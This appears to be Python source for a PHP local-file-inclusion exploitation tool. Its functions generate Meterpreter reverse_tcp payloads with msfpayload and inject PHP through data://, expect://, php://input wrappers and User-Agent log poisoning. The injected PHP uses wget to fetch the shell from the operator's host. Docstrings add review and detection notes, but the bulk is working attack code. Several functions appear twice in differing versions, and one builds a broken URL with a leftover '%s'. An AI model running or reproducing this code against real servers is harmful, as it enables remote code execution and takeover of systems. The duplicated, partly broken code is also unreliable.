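def msf_payload():
    """Prompt for callback details and write a PHP Meterpreter payload to /tmp.

    Asks the operator for a callback host and port, takes a file name from
    ``Generator().generate()`` (defined elsewhere) and runs ``msfpayload``
    with its raw output redirected to ``/tmp/<name>.php``.

    Returns:
        The tuple ``(lhost, lport, shell)``.

    Review notes:
        * ``lhost`` and ``lport`` are pasted unvalidated into a command
          string run with ``shell=True``, so shell metacharacters typed at
          either prompt are interpreted by the local shell.
        * The handler used to read ``except msf.returncode as msf_error``.
          ``returncode`` is an int, not an exception class, so neither the
          error nor the success message could ever be printed. The exit
          status is now checked after ``wait()`` and ``OSError`` is caught.
    """
    # Arguments needed for Meterpreter
    lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
    lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")

    # File name for the generated payload under /tmp
    shell = Generator().generate()

    print(t.green(" [*] ") + "Generating Data Wrapper")
    progressbar()
    print(t.red(" [!] ") + "Success!")
    print(t.green(" [*] ") + "Generating Metasploit Payload")
    progressbar()

    # msfpayload command line; the redirect is why shell=True is used below
    php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(
        lhost, lport, shell)

    try:
        msf = subprocess.Popen(php, shell=True)
        msf.wait()
    except OSError as msf_error:
        # Popen itself failed (e.g. the shell could not be spawned)
        print(t.red(" [!] ") + "Error Generating MSF Payload " + str(msf_error))
    else:
        if msf.returncode != 0:
            print(t.red(" [!] ") + "Error Generating MSF Payload ")
        else:
            print(t.red(" [!] ") + "Success! ")
            print((t.red(" [!] ") + "Payload Is Located At: /tmp/{0}.php").format(shell))

    return lhost, lport, shell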
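def execute_data(self):
    """Issue one GET whose URL is ``self.target`` plus a ``data://`` wrapper.

    The wrapper carries a base64-encoded PHP snippet. When the response is
    HTTP 200, a ``Payload`` handler (defined elsewhere) is started.

    Defender notes:
        * The ``data://text/html;base64,`` prefix appears verbatim in the
          request URL, so it shows up in web-server access logs.
        * PHP only honours ``data://`` inside include/require when
          ``allow_url_include`` is enabled.

    Review notes:
        * ``lhost`` and ``lport`` reach a ``shell=True`` command line
          unvalidated.
        * The HTTP request used to sit outside the ``try`` block, so the
          ``RequestException`` handler could never fire; it is now inside.
        * NOTE(review): nesting was recovered from a listing that had lost
          its indentation -- confirm against the upstream file.
    """
    # Arguments needed for Meterpreter
    lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
    lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")

    # File name for the generated payload under /tmp
    shell = Generator().generate()

    # Build payload
    payload = "<?php system('wget http://{0}:8000/{1}.php'); ?>".format(lhost, shell)
    encoded_payload = payload.encode('base64')

    # Build data wrapper
    data_wrapper = "data://text/html;base64,{0}".format(encoded_payload)
    lfi = self.target + data_wrapper

    print(t.green(" [*] ") + "Generating Data Wrapper")
    progressbar()
    print(t.red(" [!] ") + "Success!")
    print(t.green(" [*] ") + "Generating Metasploit Payload")
    progressbar()

    # msfpayload arguments
    php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)

    # Generate shell
    msf = subprocess.Popen(php, shell=True)
    msf.wait()

    # Make sure payload was generated correctly
    if msf.returncode != 0:
        print(t.red(" [!] ") + "Error Generating MSF Payload ")
    else:
        print(t.red(" [!] ") + "Success! ")
        print((t.red(" [!] ") + "Payload Is Located At: /tmp/{0}.php").format(shell))

    # Assumes an HTTP server on port 8000 is serving /tmp
    print(t.red(" [!] ") + "Is Your Server Running?")
    print(t.yellow(" [*] ") + "To Launch Server: http-server /tmp -p 8000")
    print(t.green(" [*] ") + "Downloading Shell")
    progressbar()

    try:
        # Request is inside the try so transport errors reach the handler
        data_request = requests.get(lfi)
        if data_request.status_code != 200:
            print(t.red(" [!] ") + "Unexpected HTTP Response ")
        else:
            handle = Payload(lhost, lport, self.target, shell)
            handle.handler()
    except requests.exceptions.RequestException as data_error:
        print(t.red(" [!] ") + "HTTP Error: %s" % data_error)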
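def execute_logs(self):
    """Send a PHP snippet in the User-Agent header, then re-request the URL.

    Both requests go to ``self.target + self.location``. The first carries
    the snippet as its ``User-Agent``; the second is sent only if the first
    returned HTTP 200. ``self.location`` is presumably a server log path
    reachable through the include parameter -- it is not defined here.

    Defender notes:
        * A ``<?php`` tag in a ``User-Agent`` value is a direct detection
          point in access logs and WAF rules.
        * The technique depends on the web server's log file being readable
          by the PHP process.

    Review notes:
        * ``lhost`` and ``lport`` reach a ``shell=True`` command line
          unvalidated.
        * The handler used to call the string returned by ``t.red(...)``,
          which raises ``TypeError`` instead of printing the HTTP error.
        * The payload file is now read under ``with`` so the handle is
          closed even if reading fails.
        * NOTE(review): nesting was recovered from a listing that had lost
          its indentation -- confirm against the upstream file.
    """
    # Arguments for Meterpreter
    lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
    lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")

    # File name for the generated payload under /tmp
    shell = Generator().generate()

    print(t.green(" [*] ") + "Generating Payload")
    progressbar()
    print(t.red(" [!] ") + "Success!")
    print(t.green(" [*] ") + "Generating Metasploit Payload")
    progressbar()

    # Generate PHP shell
    php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
    msf = subprocess.Popen(php, shell=True)
    msf.wait()

    # Handle Metasploit error codes
    if msf.returncode != 0:
        print(t.red(" [!] Error Generating MSF Payload "))
    else:
        print(t.green(" [*] ") + "Success!")

    handle = Payload(lhost, lport, self.target, shell)
    handle.handler()

    if self.nostager:
        with open("/tmp/{0}.php".format(shell), "r") as payload_file:
            encoded = payload_file.read().encode('base64').replace("\n", "")
        payload = "<?php eval(base64_decode('{0}')); ?>".format(encoded)
        raw_input(t.green(" [!] ") + "Press enter to continue when your metasploit handler is running...")
    else:
        payload = "<?php system('wget http://{0}:8000/{1}.php') ?>".format(lhost, shell)
        print((t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell))
        print(t.green(" [*] ") + "Downloading Shell")
        progressbar()

    lfi = self.target + self.location

    try:
        headers = {'User-Agent': payload}
        r = requests.get(lfi, headers=headers)
        if r.status_code != 200:
            print(t.red(" [!] Unexpected HTTP Response "))
        else:
            # Second request, sent without the custom header
            r = requests.get(lfi)
            if r.status_code != 200:
                print(t.red(" [!] Unexpected HTTP Response "))
    except requests.exceptions.RequestException as expect_error:
        print(t.red(" [!] HTTP Error ") + str(expect_error))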
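def execute_expect(self):
    """Issue one GET whose URL is ``self.target`` plus an ``expect://`` wrapper.

    With ``self.nostager`` set, the wrapper embeds the generated payload
    file, URL-quoted. Otherwise it embeds a ``wget`` command line. A
    ``Payload`` handler (defined elsewhere) is started before the request.

    Defender notes:
        * ``expect://`` is only available when the PECL ``expect``
          extension is installed on the PHP host.
        * The ``expect://`` prefix appears in the request URL and is
          therefore visible in access logs.

    Review notes:
        * ``lhost`` and ``lport`` reach a ``shell=True`` command line
          unvalidated.
        * The handler used to call the string returned by ``t.red(...)``,
          which raises ``TypeError`` instead of printing the HTTP error.
        * The payload file is now read under ``with`` so the handle is
          closed even if reading fails.
        * NOTE(review): nesting was recovered from a listing that had lost
          its indentation -- confirm against the upstream file.
    """
    # Arguments for Meterpreter
    lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
    lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")

    # File name for the generated payload under /tmp
    shell = Generator().generate()

    print(t.green(" [*] ") + "Generating Payload")
    progressbar()
    print(t.red(" [!] ") + "Success!")
    print(t.green(" [*] ") + "Generating Metasploit Payload")
    progressbar()

    # Generate PHP shell
    php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
    msf = subprocess.Popen(php, shell=True)
    msf.wait()

    # Handle Metasploit error codes
    if msf.returncode != 0:
        print(t.red(" [!] Error Generating MSF Payload "))
    else:
        print(t.green(" [*] ") + "Success!")

    handle = Payload(lhost, lport, self.target, shell)
    handle.handler()

    # Build payload
    if self.nostager:
        with open("/tmp/{0}.php".format(shell), "r") as payload_file:
            raw_php = payload_file.read()
        payload = "expect://echo \""
        payload += quote_plus(raw_php.replace("\"", "\\\"").replace("$", "\\$"))
        payload += "\" | php"
        raw_input(t.green(" [!] ") + "Press enter to continue when your metasploit handler is running...")
    else:
        payload = "expect://wget http://{0}:8000/{1}.php".format(lhost, shell)
        print((t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell))
        print(t.green(" [*] ") + "Downloading Shell")
        progressbar()

    lfi = self.target + payload

    try:
        r = requests.get(lfi)
        if r.status_code != 200:
            print(t.red(" [!] Unexpected HTTP Response "))
    except requests.exceptions.RequestException as expect_error:
        print(t.red(" [!] HTTP Error ") + str(expect_error))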
def execute_input(self):
    """POST a PHP snippet to ``self.target`` with ``php://input`` appended.

    Prompts for callback host and port, generates a payload file under /tmp
    with ``msfpayload``, then sends the snippet as the POST body. When the
    response is HTTP 200, a ``Payload`` handler (defined elsewhere) is
    started.

    Defender notes:
        * ``php://input`` appears in the request URL and the PHP source
          travels in the POST body, so both are inspectable by a WAF or
          request logging.
        * PHP only honours ``php://input`` inside include/require when
          ``allow_url_include`` is enabled.

    Review notes:
        * ``lhost`` and ``lport`` reach a ``shell=True`` command line
          unvalidated.
        * NOTE(review): nesting was recovered from a listing that had lost
          its indentation -- confirm against the upstream file.
    """
    # Callback details typed by the operator
    lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
    lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")

    # File name for the generated payload under /tmp
    namer = Generator()
    shell = namer.generate()

    # Request URL and POST body
    wrapper = "php://input"
    url = self.target + wrapper
    payload = "<?php system('wget http://%s:8000/{0}.php'); ?>".format(shell)

    print(t.green(" [*] ") + "Generating Data Wrapper")
    progressbar()
    print(t.red(" [!] ") + "Success!")
    print(t.green(" [*] ") + "Generating Metasploit Payload")
    progressbar()

    # Run msfpayload through the shell so the redirect to /tmp applies
    msf_cmd = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
    proc = subprocess.Popen(msf_cmd, shell=True)
    proc.wait()

    # Report the generator's exit status
    if proc.returncode == 0:
        print(t.green(" [*] ") + "Success!")
        print((t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell))
    else:
        print(t.red(" [!] Error Generating MSF Payload "))

    print(t.green(" [*] ") + "Downloading Shell")
    progressbar()

    try:
        resp = requests.post(url, data=payload)
        if resp.status_code == 200:
            handle = Payload(lhost, lport, self.target, shell)
            handle.handler()
        else:
            print(t.red(" [*] Unexpected HTTP Response "))
    except requests.exceptions.RequestException as input_error:
        print(t.red(" [*] HTTP Error ") + str(input_error))
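def msf_payload():
    """Prompt for callback details and write a PHP Meterpreter payload to /tmp.

    Every status line is prefixed with the current ``datetime.datetime.now()``
    value. The process exits with status 1 if ``msfpayload`` returns a
    non-zero code.

    Returns:
        The tuple ``(lhost, lport, shell)``.

    Review notes:
        * ``lhost`` and ``lport`` are pasted unvalidated into a command
          string run with ``shell=True``, so shell metacharacters typed at
          either prompt are interpreted by the local shell.
        * The ``OSError`` handler used to call the string returned by
          ``t.red(...)``, which raises ``TypeError``; it now appends the
          error text instead.
        * The bare string literals that stood in for comments are now
          ``#`` comments.
    """
    # Arguments for Meterpreter
    lhost = raw_input(
        t.cyan("[{0}] ".format(datetime.datetime.now())) + "Please Enter Host For Callbacks: ")
    lport = raw_input(
        t.cyan("[{0}] ".format(datetime.datetime.now())) + "Please Enter Port For Callbacks: ")

    # File name for the generated payload under /tmp
    shell = Generator().generate()

    print(t.cyan("[{0}] ".format(datetime.datetime.now())) + "Generating Wrapper")
    progressbar()
    print(t.red("[{0}] ".format(datetime.datetime.now())) + "Success!")
    print(t.cyan("[{0}] ".format(datetime.datetime.now())) + "Generating Metasploit Payload")
    progressbar()

    # MSF payload generation; the redirect is why shell=True is used below
    php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(
        lhost, lport, shell)

    try:
        msf = subprocess.Popen(php, shell=True)
        msf.wait()
        if msf.returncode != 0:
            print(t.red("[{0}] ".format(datetime.datetime.now())) + "Error Generating MSF Payload ")
            sys.exit(1)
        else:
            print(t.red("[{0}] ".format(datetime.datetime.now())) + "Success! ")
            print((t.red("[{0}] ".format(datetime.datetime.now())) + "Payload: /tmp/{0}.php").format(shell))
    except OSError as os_error:
        print(t.red("[{0}] ".format(datetime.datetime.now())) + str(os_error))

    return lhost, lport, shell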
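def execute_expect(self):
    """Issue one GET whose URL is ``self.target`` plus an ``expect://`` wrapper.

    The wrapper embeds a ``wget`` command line. When the response is
    HTTP 200, a ``Payload`` handler (defined elsewhere) is started.

    Defender notes:
        * ``expect://`` is only available when the PECL ``expect``
          extension is installed on the PHP host.
        * The ``expect://`` prefix appears in the request URL and is
          therefore visible in access logs.

    Review notes:
        * ``lhost`` and ``lport`` reach a ``shell=True`` command line
          unvalidated.
        * The HTTP request used to sit outside the ``try`` block, so the
          ``RequestException`` handler could never fire; it is now inside.
        * The handler used to call the string returned by ``t.red(...)``,
          which raises ``TypeError`` instead of printing the HTTP error.
        * NOTE(review): nesting was recovered from a listing that had lost
          its indentation -- confirm against the upstream file.
    """
    # Arguments for Meterpreter
    lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
    lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")

    # File name for the generated payload under /tmp
    shell = Generator().generate()

    # Build payload
    payload = "expect://wget http://{0}:8000/{1}.php".format(lhost, shell)
    lfi = self.target + payload

    print(t.green(" [*] ") + "Generating Payload")
    progressbar()
    print(t.red(" [!] ") + "Success!")
    print(t.green(" [*] ") + "Generating Metasploit Payload")
    progressbar()

    # Generate PHP shell
    php = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
    msf = subprocess.Popen(php, shell=True)
    msf.wait()

    # Handle Metasploit error codes
    if msf.returncode != 0:
        print(t.red(" [!] Error Generating MSF Payload "))
    else:
        print(t.green(" [*] ") + "Success!")
        print((t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell))

    print(t.green(" [*] ") + "Downloading Shell")
    progressbar()

    try:
        # Request is inside the try so transport errors reach the handler
        ir = requests.get(lfi)
        if ir.status_code != 200:
            print(t.red(" [!] Unexpected HTTP Response "))
        else:
            handle = Payload(lhost, lport, self.target, shell)
            handle.handler()
    except requests.exceptions.RequestException as expect_error:
        print(t.red(" [!] HTTP Error ") + str(expect_error))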
def execute_input(self):
    """POST PHP source to ``self.target`` with ``php://input`` appended.

    With ``self.nostager`` set, the POST body is the generated payload file
    itself. Otherwise it is a one-line ``wget`` snippet. A ``Payload``
    handler (defined elsewhere) is started before the request is sent.

    Defender notes:
        * ``php://input`` appears in the request URL and the PHP source
          travels in the POST body, so both are inspectable by a WAF or
          request logging.
        * PHP only honours ``php://input`` inside include/require when
          ``allow_url_include`` is enabled.

    Review notes:
        * ``lhost`` and ``lport`` reach a ``shell=True`` command line
          unvalidated.
        * NOTE(review): nesting was recovered from a listing that had lost
          its indentation -- confirm against the upstream file.
    """
    # Callback details typed by the operator
    lhost = raw_input(t.green(" [*] ") + "Please Enter Host For Callbacks: ")
    lport = raw_input(t.green(" [*] ") + "Please Enter Port For Callbacks: ")

    # File name for the generated payload under /tmp
    namer = Generator()
    shell = namer.generate()

    print(t.green(" [*] ") + "Generating Data Wrapper")
    progressbar()
    print(t.red(" [!] ") + "Success!")
    print(t.green(" [*] ") + "Generating Metasploit Payload")
    progressbar()

    # Run msfpayload through the shell so the redirect to /tmp applies
    msf_cmd = "/usr/local/share/metasploit-framework/msfpayload php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > /tmp/{2}.php".format(lhost, lport, shell)
    proc = subprocess.Popen(msf_cmd, shell=True)
    proc.wait()

    # Report the generator's exit status
    if proc.returncode == 0:
        print(t.green(" [*] ") + "Success!")
        print((t.red(" [!] ") + "Payload Is Located At: " + t.red("/tmp/{0}.php")).format(shell))
    else:
        print(t.red(" [!] Error Generating MSF Payload "))

    # Request URL
    wrapper = "php://input"
    url = self.target + wrapper

    # The two consecutive nostager checks are folded into one branch each
    if self.nostager:
        payload_file = open("/tmp/{0}.php".format(shell), "r")
        payload = payload_file.read()
        payload_file.close()
        raw_input(t.green(" [!] ") + "Press enter to continue when your metasploit handler is running...")
    else:
        payload = "<?php system('wget http://{0}:8000/{1}.php'); ?>".format(lhost, shell)
        # Assumes an HTTP server on port 8000 is serving /tmp
        print(t.red(" [!] ") + "Is Your Server Running?")
        print(t.yellow(" [*] ") + "To Launch Server: http-server /tmp -p 8000")
        print(t.green(" [*] ") + "Downloading Shell")
        progressbar()

    handle = Payload(lhost, lport, self.target, shell)
    handle.handler()

    try:
        resp = requests.post(url, data=payload)
        if resp.status_code != 200:
            print(t.red(" [*] Unexpected HTTP Response "))
    except requests.exceptions.RequestException as input_error:
        print(t.red(" [*] HTTP Error ") + str(input_error))